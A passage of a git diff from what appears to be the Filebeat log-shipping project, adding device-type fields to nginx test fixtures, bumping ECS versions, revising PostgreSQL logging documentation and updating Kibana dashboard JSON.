10.12; rv:49.0) Gecko/20100101 Firefox/49.0", "user_agent.os.full": "Mac OS X 10.12", @@ -70,6 +71,7 @@ "source.ip": "172.17.0.1", "url.original": "/stringpatch", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox Alpha", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", "user_agent.os.full": "Windows 7", @@ -120,6 +122,7 @@ "source.ip": "85.181.35.98", "url.original": "/ocelot", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0", "user_agent.os.full": "Mac OS X 10.12", @@ -168,6 +171,7 @@ "source.ip": "85.181.35.98", "url.original": "/ocelot", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36", "user_agent.os.full": "Mac OS X 10.14.0", @@ -219,6 +223,7 @@ "source.ip": "199.96.1.1", "url.original": "/assets/xxxx?q=100", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Amazon CloudFront" }, @@ -260,6 +265,7 @@ "source.ip": "2a03:0000:10ff:f00f:0000:0000:0:8000", "url.original": "/test.html", "user_agent.device.name": "Spider", + "user_agent.device.type": "Robot", "user_agent.name": "Facebot", "user_agent.original": "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)", "user_agent.version": "1.0" @@ -340,6 +346,7 @@ "source.address": "localhost", "url.original": "/test2", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox Alpha", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", "user_agent.os.full": "Windows 7", @@ -375,6 +382,7 @@ "source.address": "localhost", "url.original": "/test2", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox Alpha", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", "user_agent.os.full": "Windows 7", diff --git a/filebeat/module/nginx/error/config/nginx-error.yml b/filebeat/module/nginx/error/config/nginx-error.yml index bc547d46f36..617dbdc3eaa 100644 --- a/filebeat/module/nginx/error/config/nginx-error.yml +++ b/filebeat/module/nginx/error/config/nginx-error.yml @@ -14,4 +14,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/nginx/ingress_controller/config/ingress_controller.yml b/filebeat/module/nginx/ingress_controller/config/ingress_controller.yml index 2bd2a117d1c..a33bd9b635e 100644 --- a/filebeat/module/nginx/ingress_controller/config/ingress_controller.yml +++ b/filebeat/module/nginx/ingress_controller/config/ingress_controller.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/nginx/ingress_controller/test/test.log-expected.json b/filebeat/module/nginx/ingress_controller/test/test.log-expected.json index 89c37b4a38e..e55c45814de 100644 --- a/filebeat/module/nginx/ingress_controller/test/test.log-expected.json +++ b/filebeat/module/nginx/ingress_controller/test/test.log-expected.json @@ -52,6 +52,7 @@ "source.ip": "192.168.64.1", "url.original": "/products", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.54.0", "user_agent.version": "7.54.0" @@ -109,6 +110,7 @@ "source.ip": "192.168.64.1", "url.original": "/products/42", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.54.0", "user_agent.version": "7.54.0" @@ -166,6 +168,7 @@ "source.ip": "192.168.64.1", "url.original": "/products/42", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.54.0", "user_agent.version": "7.54.0" @@ -223,6 +226,7 @@ "source.ip": "192.168.64.1", "url.original": "/products/42", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.54.0", "user_agent.version": "7.54.0" @@ -352,6 +356,7 @@ "source.ip": "192.168.64.1", "url.original": "/products/42", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Wget", "user_agent.original": "Wget/1.20.3 (darwin18.6.0)", "user_agent.version": "1.20.3" @@ -409,6 +414,7 @@ "source.ip": "192.168.64.1", "url.original": "/products/42", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36", "user_agent.os.full": "Mac OS X 10.14.6", @@ -470,6 +476,7 @@ "source.ip": "192.168.64.1", "url.original": "/favicon.ico", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36", "user_agent.os.full": "Mac OS X 10.14.6", @@ -530,6 +537,7 @@ "source.ip": "192.168.64.1", "url.original": "/v2", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36", "user_agent.os.full": "Mac OS X 10.14.6", @@ -591,6 +599,7 @@ "source.ip": "192.168.64.1", "url.original": "/favicon.ico", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36", "user_agent.os.full": "Mac OS X 10.14.6", @@ -651,6 +660,7 @@ "source.ip": "192.168.64.1", "url.original": "/products/42", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Safari", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15", "user_agent.os.full": "Mac OS X 10.14.6", @@ -712,6 +722,7 @@ "source.ip": "192.168.64.1", "url.original": "/favicon.ico", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Safari", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15", "user_agent.os.full": "Mac OS X 10.14.6", @@ -772,6 +783,7 @@ "source.ip": "192.168.64.1", "url.original": "/products/42", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Safari", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15", "user_agent.os.full": "Mac OS X 10.14.6", @@ -832,6 +844,7 @@ "source.ip": "192.168.64.1", "url.original": "/", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Safari", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15", "user_agent.os.full": "Mac OS X 10.14.6", @@ -893,6 +906,7 @@ "source.ip": "192.168.64.1", "url.original": "/favicon.ico", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Safari", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15", "user_agent.os.full": "Mac OS X 10.14.6", @@ -953,6 +967,7 @@ "source.ip": "192.168.64.1", "url.original": "/v2", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Safari", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15", "user_agent.os.full": "Mac OS X 10.14.6", @@ -1014,6 +1029,7 @@ "source.ip": "192.168.64.1", "url.original": "/favicon.ico", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Safari", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15", "user_agent.os.full": "Mac OS X 10.14.6", @@ -1074,6 +1090,7 @@ "source.ip": "192.168.64.1", "url.original": "/products/42?address=delhi+technological+university", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Python Requests", "user_agent.original": "python-requests/2.22.0", "user_agent.version": "2.22" @@ -1131,6 +1148,7 @@ "source.ip": "192.168.64.1", "url.original": "/v2", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1191,6 +1209,7 @@ "source.ip": "192.168.64.1", "url.original": "/favicon.ico", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1251,6 +1270,7 @@ "source.ip": "192.168.64.1", "url.original": "/v2/some", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1315,6 +1335,7 @@ "source.ip": "192.168.64.14", "url.original": "/v2/some", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", diff --git a/filebeat/module/osquery/result/config/result.yml b/filebeat/module/osquery/result/config/result.yml index cd17ae39bdf..c4b45c1f03f 100644 --- a/filebeat/module/osquery/result/config/result.yml +++ b/filebeat/module/osquery/result/config/result.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/pensando/dfw/config/dfw.yml b/filebeat/module/pensando/dfw/config/dfw.yml index 404eac5f138..87d84b6abac 100644 --- a/filebeat/module/pensando/dfw/config/dfw.yml +++ b/filebeat/module/pensando/dfw/config/dfw.yml @@ -20,4 +20,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/postgresql/_meta/docs.asciidoc b/filebeat/module/postgresql/_meta/docs.asciidoc index 840a15ccd82..1d27610bd8f 100644 --- a/filebeat/module/postgresql/_meta/docs.asciidoc +++ b/filebeat/module/postgresql/_meta/docs.asciidoc @@ -21,6 +21,80 @@ The +{modulename}+ module using `.log` was tested with logs from versions 9.5 on The +{modulename}+ module using `.csv` was tested using versions 11 and 13 (distro is not relevant here). +[float] +=== Supported log formats + +This module can collect any logs from PostgreSQL servers, but to be able to +better analyze their contents and extract more information, they should be +formatted in a determined way. + +There are some settings to take into account for the log format. + +Log lines should be preffixed with the timestamp in milliseconds, the process +id, the user id and the database name. This uses to be the default in most +distributions, and is translated to this setting in the configuration file: + +["source","sh"] +---------------------------- +log_line_prefix = '%m [%p] %q%u@%d ' +---------------------------- + +PostgreSQL server can be configured to log statements and their durations and +this module is able to collect this information. To be able to correlate each +duration with their statements, they must be logged in the same line. This +happens when the following options are used: + +["source","sh"] +---------------------------- +log_duration = 'on' +log_statement = 'none' +log_min_duration_statement = 0 +---------------------------- + +Setting a zero value in `log_min_duration_statement` will log all statements +executed by a client. You probably want to configure it to a higher value, so it +logs only slower statements. This value is configured in milliseconds. + +When using `log_statement` and `log_duration` together, statements and durations +are logged in different lines, and {beatname_uc} is not able to correlate both +values, for this reason it is recommended to disable `log_statement`. + +NOTE: The PostgreSQL module of Metricbeat is also able to collect information +about all statements executed in the server. You may chose which one is better +for your needings. An important difference is that the Metricbeat module +collects aggregated information when the statement is executed several times, +but cannot know when each statement was executed. This information can be +obtained from logs. + +Other logging options that you may consider to enable are the following ones: + +["source","sh"] +---------------------------- +log_checkpoints = 'on'; +log_connections = 'on'; +log_disconnections = 'on'; +log_lock_waits = 'on'; +---------------------------- + +Both `log_connections` and `log_disconnections` can cause a lot of events if you +don't have persistent connections, so enable with care. + +[float] +=== Using CSV logs + +Since the PostgreSQL CSV log file is a well-defined format, +there is almost no configuration to be done in {beatname_uc}, just the filepath. + +On the other hand, it's necessary to configure postgresql to emit `.csv` logs. +The recommended parameters are: + +["source","sh"] +---------------------------- +logging_collector = 'on'; +log_destination = 'csvlog'; +---------------------------- + + include::../include/configuring-intro.asciidoc[] The following example shows how to set paths in the +modules.d/{modulename}.yml+ @@ -64,38 +138,14 @@ The first dashboard is for regular logs. [role="screenshot"] image::./images/filebeat-postgresql-overview.png[] -The second one shows the slowlogs of PostgreSQL. +The second one shows the slowlogs of PostgreSQL. If `log_min_duration_statement` +is not used, this dashboard will show incomplete or no data. [role="screenshot"] image::./images/filebeat-postgresql-slowlog-overview.png[] :has-dashboards!: -=== Using CSV logs - -Since the PostgreSQL CSV log file is a well-defined format, -there is almost no configuration to be done in filebeat, just the filepath - -On the other hand, it's necessary to configure postgresql to emit `.csv` logs. -The recommended parameters are: - -``` -logging_collector = 'on'; -log_destination = 'csvlog'; -log_statement = 'none'; -log_checkpoints = on; -log_connections = on; -log_disconnections = on; -log_lock_waits = on; -log_min_duration_statement = 0; -``` - -In busy servers, `log_min_duration_statement` can cause contention, so you can assign -a value greater than 0. - -Both `log_connections` and `log_disconnections` can cause a lot of events if you don't have -persistent connections, so enable with care. - :fileset_ex!: :modulename!: diff --git a/filebeat/module/postgresql/_meta/kibana/7/dashboard/Filebeat-Postgresql-overview.json b/filebeat/module/postgresql/_meta/kibana/7/dashboard/Filebeat-Postgresql-overview.json index ad349eece92..b43d4afef5c 100644 --- a/filebeat/module/postgresql/_meta/kibana/7/dashboard/Filebeat-Postgresql-overview.json +++ b/filebeat/module/postgresql/_meta/kibana/7/dashboard/Filebeat-Postgresql-overview.json @@ -1,331 +1,496 @@ { - "objects": [ + "objects": [ + { + "attributes": { + "description": "Overview dashboard for the Filebeat PostgreSQL module", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "query": { + "language": "kuery", + "query": "" + }, + "version": true + } + }, + "optionsJSON": { + "darkTheme": false + }, + "panelsJSON": [ + { + "embeddableConfig": { + "vis": { + "params": { + "sort": { + "columnIndex": null, + "direction": null + } + } + } + }, + "gridData": { + "h": 12, + "i": "1", + "w": 12, + "x": 0, + "y": 0 + }, + "panelIndex": "1", + "panelRefName": "panel_0", + "version": "7.3.0" + }, + { + "embeddableConfig": { + "columns": [ + "user.name", + "postgresql.log.database", + "log.level", + "message", + "postgresql.log.query" + ], + "sort": [ + "@timestamp", + "desc" + ] + }, + "gridData": { + "h": 24, + "i": "2", + "w": 48, + "x": 0, + "y": 12 + }, + "panelIndex": "2", + "panelRefName": "panel_1", + "version": "7.3.0" + }, + { + "embeddableConfig": {}, + "gridData": { + "h": 12, + "i": "3", + "w": 36, + "x": 12, + "y": 0 + }, + "panelIndex": "3", + "panelRefName": "panel_2", + "version": "7.3.0" + } + ], + "timeRestore": false, + "title": "[Filebeat PostgreSQL] Overview ECS", + "version": 1 + }, + "id": "158be870-87f4-11e7-ad9c-db80de0bf8d3-ecs", + "migrationVersion": { + "dashboard": "7.9.3" + }, + "namespaces": [ + "default" + ], + "references": [ + { + "id": "PostgreSQL Log Level Count-ecs", + "name": "panel_0", + "type": "visualization" + }, + { + "id": "PostgreSQL All Logs-ecs", + "name": "panel_1", + "type": "search" + }, + { + "id": "3dbd5370-87f3-11e7-ad9c-db80de0bf8d3-ecs", + "name": "panel_2", + "type": "visualization" + } + ], + "type": "dashboard", + "updated_at": "2021-03-17T16:06:10.364Z", + "version": "WzIxLDFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.dataset", + "negate": false, + "params": { + "query": "postgresql.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "postgresql.log" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "Log Level Count [Filebeat PostgreSQL] ECS", + "uiStateJSON": { + "vis": { + "params": { + "sort": { + "columnIndex": null, + "direction": null + } + } + } + }, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "log.level", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 12 + }, + "schema": "bucket", + "type": "terms" + } + ], + "params": { + "perPage": 10, + "percentageCol": "", + "showMetricsAtAllLevels": false, + "showPartialRows": false, + "showTotal": false, + "sort": { + "columnIndex": null, + "direction": null + }, + "totalFunc": "sum" + }, + "title": "Log Level Count [Filebeat PostgreSQL] ECS", + "type": "table" + } + }, + "id": "PostgreSQL Log Level Count-ecs", + "migrationVersion": { + "visualization": "7.10.0" + }, + "namespaces": [ + "default" + ], + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [] - } - }, - "savedSearchId": "PostgreSQL All Logs-ecs", - "title": "Log Level Count [Filebeat PostgreSQL] ECS", - "uiStateJSON": { - "vis": { - "params": { - "sort": { - "columnIndex": null, - "direction": null - } - } - } - }, - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "field": "log.level", - "order": "desc", - "orderBy": "1", - "size": 12 - }, - "schema": "bucket", - "type": "terms" - } - ], - "params": { - "perPage": 10, - "showMeticsAtAllLevels": false, - "showPartialRows": false, - "showTotal": false, - "sort": { - "columnIndex": null, - "direction": null - }, - "totalFunc": "sum" - }, - "title": "Log Level Count [Filebeat PostgreSQL] ECS", - "type": "table" + "id": "PostgreSQL All Logs-ecs", + "name": "search_0", + "type": "search" + } + ], + "type": "visualization", + "updated_at": "2021-03-17T16:31:15.326Z", + "version": "WzI5OSwxXQ==" + }, + { + "attributes": { + "columns": [ + "user.name", + "postgresql.log.database", + "log.level", + "message", + "postgresql.log.query" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.dataset", + "negate": false, + "params": { + "query": "postgresql.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "postgresql.log" + } } - }, - "id": "PostgreSQL Log Level Count-ecs", - "type": "visualization", - "version": 2 - }, + } + ], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + }, + "version": true + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "All Logs [Filebeat PostgreSQL] ECS", + "version": 1 + }, + "id": "PostgreSQL All Logs-ecs", + "migrationVersion": { + "search": "7.9.3" + }, + "namespaces": [ + "default" + ], + "references": [ { - "attributes": { - "columns": [ - "user.name", - "postgresql.log.database", - "log.level", - "message", - "postgresql.log.query" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "filebeat-*", - "key": "event.module", - "negate": false, - "params": { - "query": "postgresql", - "type": "phrase" - }, - "type": "phrase", - "value": "postgresql" - }, - "query": { - "match": { - "event.module": { - "query": "postgresql", - "type": "phrase" - } - } - } - } - ], - "highlightAll": true, - "index": "filebeat-*", - "query": { - "language": "kuery", - "query": "" - }, - "version": true - } - }, - "sort": [ - "@timestamp", - "desc" - ], - "title": "All Logs [Filebeat PostgreSQL] ECS", - "version": 1 - }, - "id": "PostgreSQL All Logs-ecs", - "type": "search", - "version": 1 - }, + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [] - } - }, - "savedSearchId": "PostgreSQL All Logs-ecs", - "title": "Logs by level over time [Filebeat PostgreSQL] ECS", - "uiStateJSON": {}, - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "customInterval": "2h", - "extended_bounds": {}, - "field": "@timestamp", - "interval": "auto", - "min_doc_count": 1 - }, - "schema": "segment", - "type": "date_histogram" - }, - { - "enabled": true, - "id": "3", - "params": { - "field": "log.level", - "order": "desc", - "orderBy": "1", - "size": 5 - }, - "schema": "group", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTimeMarker": false, - "addTooltip": true, - "categoryAxes": [ - { - "id": "CategoryAxis-1", - "labels": { - "show": true, - "truncate": 100 - }, - "position": "bottom", - "scale": { - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "@timestamp per month" - }, - "type": "category" - } - ], - "grid": { - "categoryLines": false, - "style": { - "color": "#eee" - } - }, - "legendPosition": "right", - "seriesParams": [ - { - "data": { - "id": "1", - "label": "Count" - }, - "drawLinesBetweenPoints": true, - "mode": "stacked", - "show": "true", - "showCircles": true, - "type": "histogram", - "valueAxis": "ValueAxis-1" - } - ], - "times": [], - "type": "histogram", - "valueAxes": [ - { - "id": "ValueAxis-1", - "labels": { - "filter": false, - "rotate": 0, - "show": true, - "truncate": 100 - }, - "name": "LeftAxis-1", - "position": "left", - "scale": { - "mode": "normal", - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "Count" - }, - "type": "value" - } - ] - }, - "title": "Logs by level over time [Filebeat PostgreSQL] ECS", - "type": "histogram" + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "type": "search", + "updated_at": "2021-03-17T16:32:17.646Z", + "version": "WzMxMSwxXQ==" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.dataset", + "negate": false, + "params": { + "query": "postgresql.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "postgresql.log" + } } - }, - "id": "3dbd5370-87f3-11e7-ad9c-db80de0bf8d3-ecs", - "type": "visualization", - "version": 1 - }, + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "Logs by level over time [Filebeat PostgreSQL] ECS", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "drop_partials": false, + "extended_bounds": {}, + "field": "@timestamp", + "interval": "auto", + "min_doc_count": 1, + "scaleMetricValues": false, + "timeRange": { + "from": "now-15m", + "to": "now" + }, + "useNormalizedEsInterval": true + }, + "schema": "segment", + "type": "date_histogram" + }, + { + "enabled": true, + "id": "3", + "params": { + "field": "log.level", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 5 + }, + "schema": "group", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTimeMarker": false, + "addTooltip": true, + "categoryAxes": [ + { + "id": "CategoryAxis-1", + "labels": { + "show": true, + "truncate": 100 + }, + "position": "bottom", + "scale": { + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "@timestamp per month" + }, + "type": "category" + } + ], + "grid": { + "categoryLines": false, + "style": { + "color": "#eee" + } + }, + "labels": { + "show": false + }, + "legendPosition": "right", + "seriesParams": [ + { + "data": { + "id": "1", + "label": "Count" + }, + "drawLinesBetweenPoints": true, + "mode": "stacked", + "show": "true", + "showCircles": true, + "type": "histogram", + "valueAxis": "ValueAxis-1" + } + ], + "thresholdLine": { + "color": "#E7664C", + "show": false, + "style": "full", + "value": 10, + "width": 1 + }, + "times": [], + "type": "histogram", + "valueAxes": [ + { + "id": "ValueAxis-1", + "labels": { + "filter": false, + "rotate": 0, + "show": true, + "truncate": 100 + }, + "name": "LeftAxis-1", + "position": "left", + "scale": { + "mode": "normal", + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "Count" + }, + "type": "value" + } + ] + }, + "title": "Logs by level over time [Filebeat PostgreSQL] ECS", + "type": "histogram" + } + }, + "id": "3dbd5370-87f3-11e7-ad9c-db80de0bf8d3-ecs", + "migrationVersion": { + "visualization": "7.10.0" + }, + "namespaces": [ + "default" + ], + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, { - "attributes": { - "description": "Overview dashboard for the Filebeat PostgreSQL module", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "query": { - "language": "kuery", - "query": "" - }, - "version": true - } - }, - "optionsJSON": { - "darkTheme": false - }, - "panelsJSON": [ - { - "col": 1, - "id": "PostgreSQL Log Level Count-ecs", - "panelIndex": 1, - "row": 1, - "size_x": 3, - "size_y": 3, - "type": "visualization" - }, - { - "col": 1, - "columns": [ - "user.name", - "postgresql.log.database", - "log.level", - "message", - "postgresql.log.query" - ], - "id": "PostgreSQL All Logs-ecs", - "panelIndex": 2, - "row": 4, - "size_x": 12, - "size_y": 6, - "sort": [ - "@timestamp", - "desc" - ], - "type": "search" - }, - { - "col": 4, - "id": "3dbd5370-87f3-11e7-ad9c-db80de0bf8d3-ecs", - "panelIndex": 3, - "row": 1, - "size_x": 9, - "size_y": 3, - "type": "visualization" - } - ], - "timeRestore": false, - "title": "[Filebeat PostgreSQL] Overview ECS", - "uiStateJSON": { - "P-1": { - "vis": { - "params": { - "sort": { - "columnIndex": null, - "direction": null - } - } - } - } - }, - "version": 1 - }, - "id": "158be870-87f4-11e7-ad9c-db80de0bf8d3-ecs", - "type": "dashboard", - "version": 1 + "id": "PostgreSQL All Logs-ecs", + "name": "search_0", + "type": "search" } - ], - "version": "6.0.0-beta1-SNAPSHOT" -} \ No newline at end of file + ], + "type": "visualization", + "updated_at": "2021-03-17T16:31:38.064Z", + "version": "WzMwNSwxXQ==" + } + ], + "version": "7.10.0" +} diff --git a/filebeat/module/postgresql/_meta/kibana/7/dashboard/Filebeat-Postgresql-slowlogs.json b/filebeat/module/postgresql/_meta/kibana/7/dashboard/Filebeat-Postgresql-slowlogs.json index d5203c91d0d..0e06097a5a3 100644 --- a/filebeat/module/postgresql/_meta/kibana/7/dashboard/Filebeat-Postgresql-slowlogs.json +++ b/filebeat/module/postgresql/_meta/kibana/7/dashboard/Filebeat-Postgresql-slowlogs.json @@ -1,300 +1,426 @@ { - "objects": [ + "objects": [ + { + "attributes": { + "description": "Dashboard for analyzing the query durations of the Filebeat PostgreSQL module", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "query": { + "language": "kuery", + "query": "" + }, + "version": true + } + }, + "optionsJSON": { + "darkTheme": false + }, + "panelsJSON": [ + { + "embeddableConfig": {}, + "gridData": { + "h": 12, + "i": "1", + "w": 24, + "x": 0, + "y": 0 + }, + "panelIndex": "1", + "panelRefName": "panel_0", + "version": "7.10.0" + }, + { + "embeddableConfig": { + "columns": [ + "user.name", + "postgresql.log.database", + "event.duration", + "postgresql.log.query" + ], + "sort": [ + "@timestamp", + "desc" + ] + }, + "gridData": { + "h": 12, + "i": "2", + "w": 24, + "x": 24, + "y": 0 + }, + "panelIndex": "2", + "panelRefName": "panel_1", + "version": "7.10.0" + }, + { + "embeddableConfig": { + "columns": [ + "user.name", + "postgresql.log.database", + "event.duration", + "postgresql.log.query" + ], + "sort": [ + "@timestamp", + "desc" + ] + }, + "gridData": { + "h": 20, + "i": "3", + "w": 48, + "x": 0, + "y": 12 + }, + "panelIndex": 